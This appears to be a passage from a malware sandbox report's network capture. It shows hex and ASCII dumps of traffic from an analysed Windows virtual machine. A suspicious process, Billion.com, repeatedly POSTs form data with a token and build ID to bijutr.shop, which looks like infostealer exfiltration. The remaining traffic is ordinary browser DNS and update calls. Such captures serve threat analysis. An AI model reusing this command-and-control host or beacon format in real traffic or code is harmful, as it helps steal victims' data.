                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 57 4c 46 43 54 52 39 30 30 5a 55 41 41 49 35 38 51 51 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 46 43 54 52 39 30 30 5a 55 41 41 49 35 38 51 51 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 46 43 54 52 39 30 30 5a 55 41 41 49 35 38 51 51 51 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------WLFCTR900ZUAAI58QQQ1Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------WLFCTR900ZUAAI58QQQ1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WLFCTR900ZUAAI58QQQ1Cont
2024-12-24 18:28:07 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-24 18:28:07 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49890 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:07 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----WTRQIE37YCBIM7Q16XBI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-24 18:28:07 UTC | 16355 | OUT | Data Ascii: ------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WTRQIE37YCBIM7Q16XBICont
2024-12-24 18:28:09 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-24 18:28:09 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49893 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:08 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----WTRQIE37YCBIM7Q16XBI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-24 18:28:08 UTC | 493 | OUT | Data Ascii: ------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WTRQIE37YCBIM7Q16XBICont
2024-12-24 18:28:09 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-24 18:28:09 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port
20 | 192.168.2.6 | 49936 | 20.198.119.84 | 443
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:24 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6e 6a 4b 6c 45 37 56 38 45 30 2b 55 6e 6e 65 55 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 36 31 35 30 37 31 33 62 34 32 39 31 30 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: njKlE7V8E0+UnneU.1Context: a66150713b42910d
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:24 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:24 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6e 6a 4b 6c 45 37 56 38 45 30 2b 55 6e 6e 65 55 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 36 31 35 30 37 31 33 62 34 32 39 31 30 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 33 63 4c 59 5a 74 57 55 43 4a 71 41 63 32 53 58 55 68 66 70 6a 5a 33 66 36 65 53 46 4b 64 6c 6d 68 64 33 31 75 6d 37 2f 73 33 47 51 59 34 79 33 62 4a 6a 34 71 7a 42 72 39 34 6e 69 75 51 39 4b 4b 61 52 44 4a 61 76 78 76 6e 37 75 51 65 36 43 72 53 74 31 76 46 51 6d 4d 42 6d 59 48 62 47 68 56 38 4b 71 4a 35 5a 64 4d 79 72 70
                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: njKlE7V8E0+UnneU.2Context: a66150713b42910d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAf3cLYZtWUCJqAc2SXUhfpjZ3f6eSFKdlmhd31um7/s3GQY4y3bJj4qzBr94niuQ9KKaRDJavxvn7uQe6CrSt1vFQmMBmYHbGhV8KqJ5ZdMyrp
2024-12-24 18:28:24 UTC | 218 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: njKlE7V8E0+UnneU.3Context: a66150713b42910d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-24 18:28:24 UTC | 14 | IN
                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
2024-12-24 18:28:24 UTC | 58 | IN
                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: 8s/43bnAG0m7TwYNBJ/Waw.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 49951 | 142.250.181.65 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:26 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-24 18:28:27 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                        Content-Length: 154477
                                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC6S2jmC7QJw9b-GO0FcK3j_8jmaYtT4H0NPtvPxtsq_YC74RGO1fm5_nTZSJUOdT76aBedcQQY
                                                                                                                                                                                                                                                                                                        X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                                        Expires: Wed, 24 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                        Age: 9013
                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                        ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49968 | 162.159.61.3 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:27 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
2024-12-24 18:28:27 UTC | 128 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
2024-12-24 18:28:28 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6bcbac64213-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
2024-12-24 18:28:28 UTC | 468 | IN
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom c)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 49969 | 162.159.61.3 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:27 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
2024-12-24 18:28:27 UTC | 128 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
2024-12-24 18:28:28 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6bcbd56191e-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
2024-12-24 18:28:28 UTC | 468 | IN
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 49972 | 172.64.41.3 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:27 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
2024-12-24 18:28:27 UTC | 128 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
2024-12-24 18:28:28 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6bcba860f6b-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
2024-12-24 18:28:28 UTC | 468 | IN
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom$()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 49976 | 162.159.61.3 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:28 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
2024-12-24 18:28:28 UTC | 128 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
2024-12-24 18:28:28 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6bd4c9e159b-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
2024-12-24 18:28:28 UTC | 468 | IN
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomP#)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 49987 | 162.159.61.3 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:28 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
2024-12-24 18:28:28 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6bdc83e7d1c-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 49992 | 172.64.41.3 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:28 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
2024-12-24 18:28:28 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6be08e10f41-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom&A)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 49990 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:28 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HVAI58YMYMYU379R9HDB
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 3165
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        Data Ascii: ------HVAI58YMYMYU379R9HDBContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------HVAI58YMYMYU379R9HDBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------HVAI58YMYMYU379R9HDBCont
2024-12-24 18:28:29 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:29 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
2024-12-24 18:28:29 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 49996 | 162.159.61.3 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:29 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
2024-12-24 18:28:29 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:29 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6c64e7b0f90-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f1 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomA)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 49997 | 162.159.61.3 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:29 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
2024-12-24 18:28:30 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:29 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6c6f9365e64-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
